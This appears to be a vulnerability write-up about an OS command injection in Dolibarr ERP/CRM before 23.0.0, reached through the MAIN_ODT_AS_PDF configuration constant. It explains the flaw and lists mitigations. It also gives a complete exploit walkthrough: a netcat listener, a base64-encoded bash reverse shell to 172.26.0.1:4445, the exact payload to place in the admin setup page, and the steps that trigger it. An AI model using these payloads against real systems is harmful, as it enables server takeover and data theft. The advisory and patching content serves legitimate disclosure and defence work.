Listen to this Post
How this CVE Works
The vulnerability arises from improper handling of a configuration constant during the ODT to PDF conversion process. When an administrator triggers a document conversion (e.g., for a proposal or invoice), the system builds a shell command by directly concatenating the `MAIN_ODT_AS_PDF` constant with a sanitized filename. The vulnerable code resides in `htdocs/includes/odtphp/odf.php` at approximately line 930, where it executes:
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
While the `$name` variable is passed through escapeshellcmd(), the `MAIN_ODT_AS_PDF` constant is taken directly from the database without any validation or sanitization. This oversight allows an authenticated administrator to inject malicious payloads into this constant.
An attacker can use command separators, such as a semicolon (;), to append arbitrary commands after the legitimate converter path. For example, setting `MAIN_ODT_AS_PDF` to `jodconverter; malicious_command` causes the shell to execute `jodconverter` first and then the injected malicious_command.
To bypass character escaping issues (e.g., with `&` or >), the attacker can encode the malicious command in Base64. The payload can be structured as:
jodconverter; echo <base64_payload> | base64 -d | bash
This decodes and executes the Base64-encoded command, granting the attacker a reverse shell with the privileges of the web server user (typically www-data).
The attack is triggered whenever a document is generated using an ODT template, such as by navigating to `Commerce -> New proposal` and clicking Generate. The injected command runs on the server, leading to full remote code execution.
The vulnerability affects Dolibarr ERP/CRM versions prior to 23.0.0. It was fixed in version 23.0.0, released on February 28, 2026, by implementing proper sanitization of the `MAIN_ODT_AS_PDF` constant.
dailycve form
Platform: Dolibarr ERP/CRM
Version: < 23.0.0
Vulnerability: OS Command Injection
Severity: Critical (CVSS: 9.4)
Date: 2026-04-17
Prediction: 2026-02-28 (fixed in v23.0.0)
What Undercode Say
The vulnerability stems from a classic case of insufficient input sanitization leading to OS command injection. Below are related Bash commands and analytical codes.
Analyzing the vulnerable code snippet:
Simulate the vulnerable command construction MAIN_ODT_AS_PDF="jodconverter" name="document.odt" command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")" echo "Command: $command" Executes: jodconverter document.odt
Testing command injection with a payload:
Simulate injection using command separator MAIN_ODT_AS_PDF="jodconverter; id" name="document.odt" command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")" echo "Command: $command" Executes: jodconverter; id document.odt The 'id' command runs after jodconverter
Base64 encoding a reverse shell payload:
Reverse shell command: bash -i >& /dev/tcp/172.26.0.1/4445 0>&1 echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64 Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
Decoding and executing the payload (as the attacker would):
Decode and execute the base64 payload echo "YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK" | base64 -d | bash
Exploit
Prerequisites:
- Login as an Administrator in Dolibarr.
- Ensure the “Commercial Proposals” module is enabled with “ODT templates” activated.
Steps to reproduce a reverse shell:
- Start a netcat listener on the attacker’s machine:
nc -lvnp 4445
2. Encode the reverse shell command in Base64:
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
Output: `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK`
- Navigate to `Home -> Setup -> Other Setup` in the Dolibarr admin panel.
- Set the `MAIN_ODT_AS_PDF` constant to the following payload:
jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
- Trigger the exploit by navigating to
Commerce -> New proposal, creating a draft, selecting an ODT template (e.g.,generic_proposal_odt), and clickingGenerate. - Check the netcat listener — a reverse shell connection will be established, granting access to the server.
Protection from this CVE
- Upgrade to Dolibarr version 23.0.0 or later. This version includes a fix that properly sanitizes the `MAIN_ODT_AS_PDF` configuration constant, preventing command injection.
- Apply the official patch if upgrading is not immediately possible. The patch is available in the 23.0.0 release.
- Restrict administrative privileges to only trusted users. Since exploitation requires authenticated admin access, minimizing the number of admins reduces risk.
- Monitor and validate configuration constants that are used in shell commands. Avoid using unsanitized user input or database values in `exec()` calls.
- Implement network segmentation to limit the impact of a compromised web server. For example, isolate the web server from critical internal systems.
- Use a Web Application Firewall (WAF) to detect and block common command injection patterns, such as command separators (
;,&&,|) in configuration inputs. - Regularly audit and review code for dangerous functions like
exec(),system(), and `shell_exec()` to ensure proper input sanitization.
Impact
Successful exploitation results in Remote Code Execution (RCE) with the privileges of the web server user (typically www-data). This can lead to:
– Full system compromise: The attacker can execute arbitrary commands, potentially gaining persistent access to the server.
– Data breach: Sensitive configuration files (e.g., database credentials) can be read, leading to further data exfiltration or unauthorized access to other systems.
– Lateral movement: The compromised server can be used as a pivot point to attack other internal hosts, depending on network segmentation.
– Service disruption: The attacker could modify or delete application code, disrupt business operations, or deploy ransomware.
– Privilege escalation: If the web server user has additional privileges (e.g., sudo permissions or access to Docker sockets), the attacker may escalate to root or escape containers.
The CVSS 4.0 base score for this vulnerability is 9.4 (Critical), reflecting the high impact on confidentiality, integrity, and availability, along with the ease of exploitation given administrative access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

